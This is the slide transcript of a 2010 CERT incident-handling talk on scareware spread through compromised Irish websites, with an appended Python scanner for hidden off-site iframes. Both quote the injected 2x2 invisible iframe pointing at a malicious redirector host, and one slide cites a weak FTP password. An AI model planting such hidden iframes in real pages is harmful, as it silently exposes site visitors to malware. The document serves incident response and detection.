Scareware Traversing the World via Ireland
As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process followed.

Presentation Transcript

  • Scareware Traversing the World via an Irish Web Exploit - Mark Hillick (@markofu), IrissCert Incident Handler. Friday 17 September 2010
  • Presentations 99%
  • Ireland
  • Ireland CSIRT/CERT?
  • Europe
  • Introducing IRISS: Volunteer handlers, Local Security Professionals, Weekly handler shifts, Not-for-profit organization
  • What do we see?
  • How do users feel? 2/3 have been victims; < 10% feel very safe; 97% expect to be victims; Law Enforcement & Businesses lack resources
  • Why we’re here!
  • ALERTS - IRISS custom
  • Scareware
  • $$$$ FBI -> $150 million
  • How easy? Very :-(
  • Growth
  • Scareware Evolving
  • Remember Zen and the art of incident handling ...
  • Reactions
  • Reactions
  • Reactions
  • Identification: Gather information, Analysis, Determine
  • Identification - Vector: Legitimate Websites
  • Identification - WA: Not visible iframe injection • <iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/tds_a/go.php/go.php?id=4" /></body>
  • Identification - iframe
  • Identification - WA: DNS requests, HTTP • Gets • Posts, Scripts
  • Identification - SW
  • Identification - SW
  • Identification - SW
  • Identification - SW
  • Identification - Analysis: Exploited Sites hosted on one server; Weak FTP passwords (e.g. Ghost61); Two most popular web site attacks – • Gumblar - PHP Sites • Asprox - SQL Injection
  • Containment: Verify, Stop the Spread • Remove • Notify • Inform, Blackhole. Source: Profound Whatever - Flickr Creative Commons
  • Eradication: Remove, Improve, Vulnerability Analysis, Restore
  • Eradication - How?
  • Eradication - Hosting: Struggle but...
  • Recovery. Source: Dilbert ©2009, United Feature Syndicate, Inc.
  • Recovery - Be Sure! Validate, Restore & Monitor
  • Lessons Learned
  • Lessons Learned: Things required for an IR plan - • IR Team • Contact List • Regular Reviews • Escalation Process
  • Lessons Learned: Awareness; Back-up & test the restore ;-); Patch; Test website for vulnerabilities & exploits; Defence-in-depth; Free Local & Online tools for safer browsing & analysis
  • Lessons Learned: “A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website” - Jeremiah Grossman (Feb. 2010)
  • Lessons Learned - Prep: Fail to Prepare, well you know the rest :)
  • Scareware Evolution (source: http://www.f-secure.com)
  • What do you use?
  • Thank you very much (go raibh míle maith agat). Twitter: @markofu @irisscert @hackeire #irisscon. Google-Fu: “scareware site:sans.org”. Unless stated, source of images -> Flickr Creative Commons, iStockPhoto or my own!!
  • Well......
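The "not visible iframe injection" on the Identification slide (a 2x2, frameborder=0 iframe pulling content from another host) is the kind of indicator a site owner can scan for during identification. The following Python scanner is an added example, not part of the presentation or of IRISS tooling: it flags iframes that are tiny or CSS-hidden and whose src is off-site. The sample HTML (a legitimate embed next to the injected tag quoted on the slide) and the site host example.ie are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate embed plus the 2x2 injected iframe quoted on the slide.
SAMPLE_HTML = """<html><body>
<p>Welcome to our site</p>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/tds_a/go.php/go.php?id=4" /></body></html>"""

HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> tag (self-closing `<iframe ... />` included)."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # HTMLParser lowercases attribute names; a value-less attribute arrives as None.
            self.iframes.append({name: (value or "") for name, value in attrs})


def _px(value):
    """Parse a width/height attribute such as '2' or '2px'; None if absent or non-numeric."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def find_hidden_iframes(html, site_host, max_px=10):
    """Return iframes that are effectively invisible and load content from a foreign host."""
    parser = IframeCollector()
    parser.feed(html)
    site_host = site_host.lower()
    hits = []
    for attrs in parser.iframes:
        height, width = _px(attrs.get("height")), _px(attrs.get("width"))
        tiny = height is not None and width is not None and height <= max_px and width <= max_px
        css_hidden = bool(HIDDEN_CSS.search(attrs.get("style", "")))
        src = attrs.get("src", "")
        src_host = (urlparse(src).hostname or "").lower()
        offsite = bool(src_host) and src_host != site_host and not src_host.endswith("." + site_host)
        if (tiny or css_hidden) and offsite:
            hits.append({"src": src, "height": height, "width": width,
                         "frameborder": attrs.get("frameborder"), "css_hidden": css_hidden})
    return hits
```

Running `find_hidden_iframes(SAMPLE_HTML, "example.ie")` reports only the jobstopfil.biz iframe; a visible, normal-sized embed passes, and a tiny iframe pointing back at the site's own host is left alone.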